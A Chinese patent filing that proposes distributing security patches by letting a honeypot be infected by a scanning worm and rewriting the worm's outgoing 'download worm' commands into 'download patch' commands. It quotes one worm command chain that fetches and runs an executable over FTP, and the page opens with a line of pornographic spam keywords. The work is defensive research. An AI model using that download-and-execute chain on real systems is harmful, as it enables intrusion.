亚洲成年人黄色一级片,日本香港三级亚洲三级,黄色成人小视频,国产青草视频,国产一区二区久久精品,91在线免费公开视频,成年轻人网站色直接看

一種補(bǔ)丁分發(fā)方法

文檔序號(hào):7744504閱讀:206來源:國知局
專利名稱:一種補(bǔ)丁分發(fā)方法
技術(shù)領(lǐng)域
本發(fā)明涉及網(wǎng)絡(luò)安全技術(shù)領(lǐng)域,具體地說,本發(fā)明涉及一種補(bǔ)丁分發(fā)方法。
背景技術(shù)
當(dāng)前,計(jì)算機(jī)與互聯(lián)網(wǎng)已經(jīng)廣泛深入到人們?nèi)粘I钪?,成為人們?jīng)常使用的工 具,而現(xiàn)在的絕大多數(shù)個(gè)人計(jì)算機(jī)所用的操作系統(tǒng)和應(yīng)用軟件都包含系統(tǒng)漏洞或軟件漏 洞。所謂系統(tǒng)漏洞,是操作系統(tǒng)自身的漏洞,這些漏洞在安裝了操作系統(tǒng)后或者安裝了系統(tǒng) 補(bǔ)丁后都可能存在或新產(chǎn)生;所謂軟件漏洞,是用戶在操作系統(tǒng)上安裝軟件后引入的漏洞, 比如中國常用的聊天軟件QQ、MSN,郵件軟件FoxmaiLOutlook Express,媒體播放軟件暴風(fēng) 影音、千千靜聽等,都存在可被惡意代碼利用的軟件漏洞,其中有些漏洞已經(jīng)被大規(guī)模利用 實(shí)施惡意攻擊。近年來,對(duì)操作系統(tǒng)漏洞的利用數(shù)量比較平 穩(wěn),而對(duì)軟件漏洞的利用則呈遞增趨 勢(shì)。特別是對(duì)瀏覽器軟件(如微軟的IE7)漏洞的利用,更是廣泛存在。例如,網(wǎng)站掛馬就 是利用了瀏覽器漏洞,或者瀏覽器嵌入 的軟件(如媒體播放器)漏洞而入侵用戶計(jì)算機(jī)系 統(tǒng)的攻擊行為。消除漏洞的根本辦法就是安裝軟件補(bǔ)丁。如何有效地分發(fā)補(bǔ)丁,是眾多網(wǎng)絡(luò)安全 管理人員所面臨的一個(gè)重要任務(wù)。以微軟(Windows操作系統(tǒng)生產(chǎn)商)為例,其各種系統(tǒng)安 全補(bǔ)丁幾乎每周都會(huì)出現(xiàn),而具有大面積客戶端的網(wǎng)絡(luò)靠手工進(jìn)行補(bǔ)丁升級(jí)是不現(xiàn)實(shí)的, 一般的用戶本身也不具有為系統(tǒng)打補(bǔ)丁的意識(shí),很多用戶本身也不知道需要安裝哪些補(bǔ) 丁,甚至更有部分用戶無法獨(dú)立安裝操作系統(tǒng)補(bǔ)丁,這些都已經(jīng)造成網(wǎng)絡(luò)中的客戶端出現(xiàn) 安全漏洞,成為安全隱患。鑒于補(bǔ)丁分發(fā)存在難度,微軟推出了 SUS、WSUS和SMS等補(bǔ)丁分 發(fā)工具,這些工具提供了相對(duì)牢固的補(bǔ)丁和更新支持,但是存在一個(gè)致命性的弱點(diǎn)一旦補(bǔ) 丁分發(fā)客戶端程序被惡意代碼關(guān)閉,則失去了自動(dòng)下載補(bǔ)丁的功能。綜上所述,計(jì)算機(jī)系統(tǒng)受到網(wǎng)絡(luò)攻擊的重要原因是存在漏洞,如果能夠?yàn)橛脩粝?統(tǒng)及時(shí)地打上新補(bǔ)丁,則會(huì)有效降低被攻擊成功的概率。在最短的時(shí)間內(nèi)安裝補(bǔ)丁將會(huì)極 大地保護(hù)網(wǎng)絡(luò)和其所承載的機(jī)密,同時(shí)也可以使更少的用戶免受蠕蟲的侵襲。對(duì)于機(jī)器眾 多的用戶,繁雜的手工補(bǔ)丁安裝已經(jīng)不能適應(yīng)大規(guī)模網(wǎng)絡(luò)的管理,而SUS、WSUS和SMS等補(bǔ) 丁分發(fā)工具本身易于成為惡意代碼的攻擊目標(biāo),因此它們并不能確保計(jì)算機(jī)系統(tǒng)的安全。 因此,當(dāng)前還迫切需要依靠新的技術(shù)手段來實(shí)現(xiàn)對(duì)操作系統(tǒng)的漏洞自動(dòng)修補(bǔ)方案,以作為 對(duì)現(xiàn)有補(bǔ)丁分發(fā)工具的補(bǔ)充,及時(shí)為更多的計(jì)算機(jī)系統(tǒng)打上相應(yīng)的補(bǔ)丁。

發(fā)明內(nèi)容
本發(fā)明的目的是提供一種具有全新機(jī)制的補(bǔ)丁分發(fā)方案,以作為對(duì)現(xiàn)有補(bǔ)丁分發(fā) 工具的補(bǔ)充,及時(shí)為更多的存在漏洞的計(jì)算機(jī)系統(tǒng)打上相應(yīng)的補(bǔ)丁。為實(shí)現(xiàn)上述發(fā)明目的,本發(fā)明提供了一種補(bǔ)丁分發(fā)方法,包括下列步驟1)蜜罐機(jī)被掃描性蠕蟲感染;
2)蜜罐機(jī)作為攻擊源攻擊其它計(jì)算機(jī)系統(tǒng);3)用補(bǔ)丁程序替換用于攻擊活動(dòng)的惡意代碼;4)將補(bǔ)丁程序投遞到遠(yuǎn)程受攻擊計(jì)算機(jī)系統(tǒng)。其中,所述步驟2)還包括蜜罐機(jī)作為攻擊源隨機(jī)向遠(yuǎn)程主機(jī)發(fā)送攻擊報(bào)文,遠(yuǎn) 程主機(jī)執(zhí)行攻擊報(bào)文的代碼,打開命令通道。其中,所述步驟3)還包括攔截并檢測(cè)蜜罐機(jī)發(fā)送出去的報(bào)文,當(dāng)報(bào)文中包含惡 意代碼時(shí),用相應(yīng)補(bǔ)丁程序替換所述惡意代碼。其中,所述步驟3)還包括蜜罐機(jī)上的驅(qū)動(dòng)程序攔截并檢測(cè)蜜罐機(jī)發(fā)送出去的所 有報(bào)文,當(dāng)發(fā)現(xiàn)從蜜罐機(jī)發(fā)出的報(bào)文中含有“下載蠕蟲文件命令”時(shí),將“下載蠕蟲文件命 令”替換為“下載補(bǔ)丁文件命令”。其中,所述步驟4)還包括蜜罐機(jī)以所述掃描性蠕蟲的攻擊機(jī)制將所述補(bǔ)丁程序 復(fù)制到受攻擊計(jì)算機(jī)系統(tǒng),并使受攻擊計(jì)算機(jī)系統(tǒng)運(yùn)行所述補(bǔ)丁程序。其中,所述步驟4)包括下列子步驟41)蜜罐機(jī)向遠(yuǎn)程主機(jī)打開的命令通道發(fā)送替換后的攻擊報(bào)文;42)遠(yuǎn)程主機(jī)收到替換后的攻擊報(bào)文后,從蜜罐機(jī)下載并運(yùn)行補(bǔ)丁。其中,所述蜜罐機(jī)安裝有防火墻軟件并設(shè)置防火墻規(guī)則以攔截蜜罐機(jī)發(fā)往非授權(quán) IP地址段的報(bào)文。其中,所述蜜罐機(jī)上拷貝一個(gè)或多個(gè)重要漏洞的補(bǔ)丁安裝文件。其中,所述步驟4)中,所述蜜罐機(jī)為所述遠(yuǎn)程受攻擊計(jì)算機(jī)系統(tǒng)提供補(bǔ)丁安裝文 件下載服務(wù)。其中,所述蜜罐機(jī)為所述遠(yuǎn)程受攻擊計(jì)算機(jī)系統(tǒng)提供FTP、TFTP或HTTP下載服務(wù)。與現(xiàn)有技術(shù)相比,本發(fā)明提供了一種利用掃描性蠕蟲的傳播機(jī)制進(jìn)行補(bǔ)丁分發(fā)的 方案,能夠準(zhǔn)確的進(jìn)行補(bǔ)丁分發(fā)并即時(shí)運(yùn)行,能夠及時(shí)地有針對(duì)性地為網(wǎng)絡(luò)中的計(jì)算機(jī)系 統(tǒng)安裝補(bǔ)丁,同時(shí)不會(huì)給網(wǎng)絡(luò)引入新的攻擊流量。同時(shí),本發(fā)明是一種與現(xiàn)有補(bǔ)丁分發(fā)工具 相比具有不同機(jī)制的補(bǔ)丁分發(fā)方案,能夠作為對(duì)現(xiàn)有補(bǔ)丁分發(fā)工具的補(bǔ)充,及時(shí)為更多的 計(jì)算機(jī)系統(tǒng)打上相應(yīng)的補(bǔ)丁。


圖1示出了掃描性蠕蟲的傳播流程示意圖;圖2示出了本發(fā)明一個(gè)實(shí)施例的補(bǔ)丁分發(fā)流程示意圖。
具體實(shí)施例方式以下,結(jié)合附圖和實(shí)施例本發(fā)明做進(jìn)一步的詳細(xì)說明。根據(jù)本發(fā)明的一個(gè)實(shí)施例,提供了一種利用蜜罐技術(shù)的補(bǔ)丁分發(fā)方法,該方法通 過替換蜜罐向外發(fā)出的攻擊報(bào)文內(nèi)容,將有害的惡意代碼投遞替換為有益的與漏洞相關(guān)的 補(bǔ)丁投遞,并在遠(yuǎn)程主機(jī)上運(yùn)行,從而實(shí)現(xiàn)了有針對(duì)性的補(bǔ)丁分發(fā)。通過這種方法,可以及 時(shí)為存在漏洞的主機(jī)打上補(bǔ)丁,又不會(huì)為網(wǎng)絡(luò)引入新的攻擊流量。掃描性蠕蟲是攻擊漏洞的典型惡意代碼,本實(shí)施例需要利用掃描性蠕蟲的攻擊機(jī) 制進(jìn)行補(bǔ)丁投遞。主流掃描性蠕蟲的傳播步驟如圖1所示。
步驟一攻擊源主機(jī)上的蠕蟲隨機(jī)生成一個(gè)待攻擊的目標(biāo)IP地址A,向A發(fā)送攻 擊報(bào)文(ShellCOdel),A上包含漏洞的程序收到攻擊報(bào)文后,會(huì)執(zhí)行Shellcodel代碼,打開 命令通道,等待執(zhí)行攻擊源發(fā)來的后續(xù)命令;步驟二 蠕蟲向A打開的命令通道發(fā)送命令,使A從蜜罐機(jī)下載蠕蟲并運(yùn)行;步驟三A上含漏洞的程序試圖從攻擊源下載蠕蟲并執(zhí)行,蠕蟲打開的Ftp/Tftp 服務(wù)程序?yàn)锳提供下載;步驟四蠕蟲打開的Ftp/Tftp服務(wù)并將自身復(fù)制到A,A運(yùn)行蠕蟲,成為新的攻擊源。下面對(duì)本實(shí)施例做更加詳細(xì)的描述。依據(jù)本實(shí)施例構(gòu)建的補(bǔ)丁分發(fā)系統(tǒng)包括兩部分,第一部分是蜜罐機(jī),第二部分是 驅(qū)動(dòng)程序,所述驅(qū)動(dòng)程序可以安裝在所述蜜罐機(jī)上。下面分別描述本實(shí)施例的蜜罐機(jī)和驅(qū) 動(dòng)程序。1.用于捕獲惡意代碼的蜜罐機(jī)H蜜罐是一種安全資源,它是網(wǎng)絡(luò)安全人員主動(dòng)設(shè)置的一種特殊的存在漏洞的主 機(jī),其作用在于被掃描、攻擊和攻陷,并通過對(duì)所有流入/流出蜜罐的網(wǎng)絡(luò)流量的監(jiān)視和分 析,達(dá)到對(duì)網(wǎng)絡(luò)攻擊活動(dòng)進(jìn)行監(jiān)視、檢測(cè)和分析的目的。蜜罐一般可分為被動(dòng)蜜罐和主動(dòng)蜜 罐,被動(dòng)蜜罐被動(dòng)等待被攻擊,主動(dòng)蜜罐主動(dòng)對(duì)外訪問危險(xiǎn)資源。本實(shí)施例采用的是被動(dòng)蜜 罐,該蜜罐被動(dòng)等待被掃描性蠕蟲攻擊。本實(shí)施例的蜜罐機(jī)可采用Windows或Linux系統(tǒng),它們?cè)眍愃?。下面將?Windows系統(tǒng)為例說明構(gòu)造蜜罐機(jī)H的方法。該蜜罐機(jī)需要安裝好操作系統(tǒng)、接入互聯(lián)網(wǎng)、 設(shè)置公網(wǎng)IP地址、配置防火墻、安裝一個(gè)或多個(gè)常用軟件、運(yùn)行蜜罐程序(蜜罐機(jī)上運(yùn)行 的、用于模擬漏洞與攻擊源交互的程序,該程序讓遠(yuǎn)程攻擊源認(rèn)為本系統(tǒng)存在漏洞且可以 攻擊成功),然后等待被掃描性蠕蟲攻擊。本實(shí)施例中,可按下列步驟準(zhǔn)備蜜罐機(jī)。步驟一準(zhǔn)備一臺(tái)安裝Windows XP的主機(jī)作為蜜罐機(jī);步驟二 在安裝好操作系統(tǒng)的蜜罐機(jī)上安裝一個(gè)或多個(gè)常用的應(yīng)用軟件,如IIS、 MySQL、MSN 等;步驟三在蜜罐機(jī)上安裝防火墻軟件,設(shè)置防火墻規(guī)則,攔截蜜罐機(jī)發(fā)往非授權(quán) IP地址段的報(bào)文;本步驟目的是提供一種靈活的管理策略,使管理員可以禁止蜜罐機(jī)掃描 某些主機(jī)。蜜罐機(jī)掃描非本網(wǎng)主機(jī)是非法的,但蜜罐機(jī)可以掃描本單位特定網(wǎng)段的主機(jī)。步驟四在蜜罐機(jī)上安裝和使用漏洞檢測(cè)軟件(如360安全衛(wèi)士)確認(rèn)蜜罐機(jī)存 在多個(gè)系統(tǒng)漏洞和應(yīng)用軟件漏洞;步驟五從蜜罐機(jī)以外的其他聯(lián)網(wǎng)主機(jī)上訪問蜜罐機(jī),確認(rèn)其網(wǎng)絡(luò)連接正常;步驟六在蜜罐機(jī)上拷貝一個(gè)或多個(gè)重要漏洞的補(bǔ)丁安裝文件(可執(zhí)行文件格 式);步驟七在蜜罐機(jī)上安裝驅(qū)動(dòng)程序D(驅(qū)動(dòng)程序D的詳細(xì)內(nèi)容將在下文中描述,因 此這里不作贅述),用于修改有害報(bào)文內(nèi)容;步驟八在蜜罐機(jī)上安裝Ftp/Tftp服務(wù)軟件,將補(bǔ)丁放在根目錄供下載。2.用于修改有害報(bào)文內(nèi)容的驅(qū)動(dòng)程序D
驅(qū)動(dòng)程序D運(yùn)行在蜜罐機(jī)H上,具有系統(tǒng)級(jí)別的權(quán)限。D采用攔截并轉(zhuǎn)發(fā)報(bào)文的方 式監(jiān)控從蜜罐機(jī)H發(fā)出的所有IPv4報(bào)文。需要說明,攔截轉(zhuǎn)發(fā)報(bào)文不同于旁路監(jiān)聽報(bào)文, 前者可以修改報(bào)文內(nèi)容,而后者只能觀察報(bào)文內(nèi)容。當(dāng)D發(fā)現(xiàn)了 H發(fā)出的報(bào)文C中包含了 可疑的從蜜罐機(jī)H下載文件的通信內(nèi)容(即惡意代碼投遞命令,如get worm, exe),,就將該 內(nèi)容替換(如替換為get patch.exe),使得遠(yuǎn)程主機(jī)從H下載的文件并不是原有的可疑惡 意代碼M(如worm, exe),而是特定的補(bǔ)丁程序P (如patch, exe),補(bǔ)丁程序P利用報(bào)文C的 原有機(jī)制運(yùn)行被投遞到遠(yuǎn)程主機(jī)。驅(qū)動(dòng)程序D可按下列步驟編寫。步驟一編寫網(wǎng)絡(luò)流量過濾驅(qū)動(dòng)程序,截獲流經(jīng)蜜罐機(jī)上所有IPv4報(bào)文;步驟二 編寫監(jiān)控蜜罐機(jī)H的驅(qū)動(dòng)程序。對(duì)于每個(gè)流出蜜罐機(jī)的報(bào)文,如果包含 ftp-n-s或者tftp. exe-i,則將get、rundll32或可執(zhí)行文件名(如worm, exe)替換為補(bǔ)丁 程序P的文件名(如patch, exe)。例如從蜜罐機(jī)發(fā)往存在漏洞的目標(biāo)機(jī)V的報(bào)文內(nèi)容如 下echo open IP Port > χ&echo user 11 >> χ&echo get worm, exe >> χ&echo bye >> χ&ftp. exe-n-s: χ&worm. exe&exit\r\n則驅(qū)動(dòng)程序D將其中worm, exe替換為patch, exe,從而使得V連接到蜜罐機(jī)并下 載patch, exe并運(yùn)行。需要說明,報(bào)文內(nèi)容的變化形式很多,但一般會(huì)在ftp-n-s和tftp. exe-i中選擇其中一個(gè)。當(dāng)然,某些情況下,也存在利用HTTP服務(wù)下載蠕蟲的情況,其原理 與FTP和TFTP相同,只需對(duì)驅(qū)動(dòng)程序的相應(yīng)代碼做適當(dāng)調(diào)整即可,這里不再贅述。而是否存在rundll32取決于蠕蟲文件格式,如果是exe格式則不需要rundll32, 如果是dll格式則需要,在替換報(bào)文內(nèi)容時(shí)需要逐一分情況判斷,這是本領(lǐng)域技術(shù)人員所 公知的知識(shí),這里不作贅述。圖2示出了本實(shí)施例中進(jìn)行補(bǔ)丁分發(fā)的流程示意圖,該補(bǔ)丁分發(fā)方法基于上述補(bǔ) 丁分發(fā)系統(tǒng)實(shí)現(xiàn),具體包括下列步驟步驟一蜜罐機(jī)H被掃描型蠕蟲攻陷后,轉(zhuǎn)變?yōu)楣粼?。作為攻擊源,蜜罐機(jī)H隨 機(jī)生成一個(gè)待攻擊的目標(biāo)IP地址A,向A發(fā)送攻擊報(bào)文(Shellcodel),地址A的遠(yuǎn)程主機(jī) V上包含漏洞的程序收到攻擊報(bào)文后,會(huì)執(zhí)行Shellcodel代碼,打開命令通道;步驟二 蜜罐機(jī)上的驅(qū)動(dòng)程序D發(fā)現(xiàn)從蜜罐機(jī)H發(fā)出的報(bào)文中含有“下載蠕蟲文 件命令”時(shí),將“下載蠕蟲文件命令”替換為“下載補(bǔ)丁文件命令(ShellCOde2)”;步驟三蜜罐機(jī)向遠(yuǎn)程主機(jī)V打開的命令通道發(fā)送命令,使遠(yuǎn)程主機(jī)V從蜜罐機(jī)下 載補(bǔ)丁并運(yùn)行;步驟四遠(yuǎn)程主機(jī)V上含漏洞的程序從蜜罐機(jī)下載補(bǔ)丁,蜜罐機(jī)一直打開的Ftp/ Tftp服務(wù)程序?yàn)檫h(yuǎn)程主機(jī)V提供下載;步驟五遠(yuǎn)程主機(jī)V運(yùn)行補(bǔ)丁。
本實(shí)施例的補(bǔ)丁分發(fā)工具可以為在一個(gè)管理域的網(wǎng)絡(luò)提供一種內(nèi)部使用的補(bǔ)丁 自動(dòng)分發(fā)方法。相對(duì)于現(xiàn)有技術(shù),本實(shí)施例只需在網(wǎng)絡(luò)內(nèi)布置一臺(tái)蜜罐機(jī),便可以向多臺(tái)其 他主機(jī)投遞補(bǔ)丁 ;此時(shí),對(duì)于一個(gè)網(wǎng)絡(luò)內(nèi)的計(jì)算機(jī)系統(tǒng),即使用戶關(guān)閉了自動(dòng)更新機(jī)制(或 者被惡意代碼關(guān)閉),也未安裝任何補(bǔ)丁分發(fā)客戶端,該計(jì)算機(jī)系統(tǒng)仍然有機(jī)會(huì)獲得補(bǔ)丁。本實(shí)施例針對(duì)掃描性蠕蟲的傳播原理,利用掃描性蠕蟲的傳播機(jī)制,能夠準(zhǔn)確的 進(jìn)行補(bǔ)丁分發(fā)并即時(shí)運(yùn)行,能夠及時(shí)地有針對(duì)性地為網(wǎng)絡(luò)中的計(jì)算機(jī)系統(tǒng)安裝補(bǔ)丁,同時(shí) 不會(huì)給網(wǎng)絡(luò)引入新的攻擊流量。最后所應(yīng)說明的是,以上實(shí)施例僅用以說明本發(fā)明的技術(shù)方案而非限制。盡管參照實(shí)施例對(duì)本發(fā)明進(jìn)行了詳細(xì)說明,本領(lǐng)域的普通技術(shù)人員應(yīng)當(dāng)理解,對(duì)本發(fā)明的技術(shù)方 案進(jìn)行修改或者等同替換,都不脫離本發(fā)明技術(shù)方案的精神和范圍,其均應(yīng)涵蓋在本發(fā)明 的權(quán)利要求范圍當(dāng)中。
權(quán)利要求
一種補(bǔ)丁分發(fā)方法,包括下列步驟1)蜜罐機(jī)被掃描性蠕蟲感染;2)蜜罐機(jī)作為攻擊源攻擊其它計(jì)算機(jī)系統(tǒng);3)用補(bǔ)丁程序替換用于攻擊活動(dòng)的惡意代碼;4)將補(bǔ)丁程序投遞到遠(yuǎn)程受攻擊計(jì)算機(jī)系統(tǒng)。
2.根據(jù)權(quán)利要求1所述的補(bǔ)丁分發(fā)方法,其特征在于,所述步驟2)還包括蜜罐機(jī)作 為攻擊源隨機(jī)向遠(yuǎn)程主機(jī)發(fā)送攻擊報(bào)文,遠(yuǎn)程主機(jī)執(zhí)行攻擊報(bào)文的代碼,打開命令通道。
3.根據(jù)權(quán)利要求1所述補(bǔ)丁分發(fā)方法,其特征在于,所述步驟3)還包括攔截并檢測(cè) 蜜罐機(jī)發(fā)送出去的報(bào)文,當(dāng)報(bào)文中包含惡意代碼時(shí),用相應(yīng)補(bǔ)丁程序替換所述惡意代碼。
4.根據(jù)權(quán)利要求3所述的補(bǔ)丁分發(fā)方法,其特征在于,所述步驟3)還包括蜜罐機(jī)上 的驅(qū)動(dòng)程序攔截并檢測(cè)蜜罐機(jī)發(fā)送出去的所有報(bào)文,當(dāng)發(fā)現(xiàn)從蜜罐機(jī)發(fā)出的報(bào)文中含有 “下載蠕蟲文件命令”時(shí),將“下載蠕蟲文件命令”替換為“下載補(bǔ)丁文件命令”。
5.根據(jù)權(quán)利要求2所述的補(bǔ)丁分發(fā)方法,其特征在于,所述步驟4)還包括蜜罐機(jī)以 所述掃描性蠕蟲的攻擊機(jī)制將所述補(bǔ)丁程序復(fù)制到受攻擊計(jì)算機(jī)系統(tǒng),并使受攻擊計(jì)算機(jī) 系統(tǒng)運(yùn)行所述補(bǔ)丁程序。
6.根據(jù)權(quán)利要求5所述的補(bǔ)丁分發(fā)方法,其特征在于,所述步驟4)包括下列子步驟41)蜜罐機(jī)向遠(yuǎn)程主機(jī)打開的命令通道發(fā)送替換后的攻擊報(bào)文;42)遠(yuǎn)程主機(jī)收到替換后的攻擊報(bào)文后,從蜜罐機(jī)下載并運(yùn)行補(bǔ)丁。
7.根據(jù)權(quán)利要求1所述的補(bǔ)丁分發(fā)方法,其特征在于,所述蜜罐機(jī)安裝有防火墻軟件 并設(shè)置防火墻規(guī)則以攔截蜜罐機(jī)發(fā)往非授權(quán)IP地址段的報(bào)文。
8.根據(jù)權(quán)利要求1所述的補(bǔ)丁分發(fā)方法,其特征在于,所述蜜罐機(jī)上拷貝一個(gè)或多個(gè) 重要漏洞的補(bǔ)丁安裝文件。
9.根據(jù)權(quán)利要求8所述的補(bǔ)丁分發(fā)方法,其特征在于,所述步驟4)中,所述蜜罐機(jī)為所 述遠(yuǎn)程受攻擊計(jì)算機(jī)系統(tǒng)提供補(bǔ)丁安裝文件下載服務(wù)。
10.根據(jù)權(quán)利要求9所述的補(bǔ)丁分發(fā)方法,其特征在于,所述蜜罐機(jī)為所述遠(yuǎn)程受攻擊 計(jì)算機(jī)系統(tǒng)提供FTP、TFTP或HTTP下載服務(wù)。
全文摘要
本發(fā)明提供一種補(bǔ)丁分發(fā)方法,包括下列步驟1蜜罐機(jī)被掃描性蠕蟲感染;當(dāng)蜜罐機(jī)作為攻擊源攻擊其它計(jì)算機(jī)系統(tǒng)時(shí),用補(bǔ)丁程序替換用于攻擊活動(dòng)的惡意代碼,并將補(bǔ)丁程序投遞到遠(yuǎn)程受攻擊計(jì)算機(jī)系統(tǒng)。與現(xiàn)有技術(shù)相比,本發(fā)明提供了一種利用掃描性蠕蟲的傳播機(jī)制進(jìn)行補(bǔ)丁分發(fā)的方案,能夠準(zhǔn)確的進(jìn)行補(bǔ)丁分發(fā)并即時(shí)運(yùn)行,能夠及時(shí)地有針對(duì)性地為網(wǎng)絡(luò)中的計(jì)算機(jī)系統(tǒng)安裝補(bǔ)丁,同時(shí)不會(huì)給網(wǎng)絡(luò)引入新的攻擊流量。同時(shí),本發(fā)明是一種與現(xiàn)有補(bǔ)丁分發(fā)工具相比具有不同機(jī)制的補(bǔ)丁分發(fā)方案,能夠作為對(duì)現(xiàn)有補(bǔ)丁分發(fā)工具的補(bǔ)充,及時(shí)為更多的計(jì)算機(jī)系統(tǒng)打上相應(yīng)的補(bǔ)丁。
文檔編號(hào)H04L29/06GK101800754SQ20101013316
公開日2010年8月11日 申請(qǐng)日期2010年3月25日 優(yōu)先權(quán)日2010年3月25日
發(fā)明者崔翔, 時(shí)金橋, 郝志宇, 郭莉 申請(qǐng)人:中國科學(xué)院計(jì)算技術(shù)研究所
網(wǎng)友詢問留言 已有0條留言
  • 還沒有人留言評(píng)論。精彩留言會(huì)獲得點(diǎn)贊!
1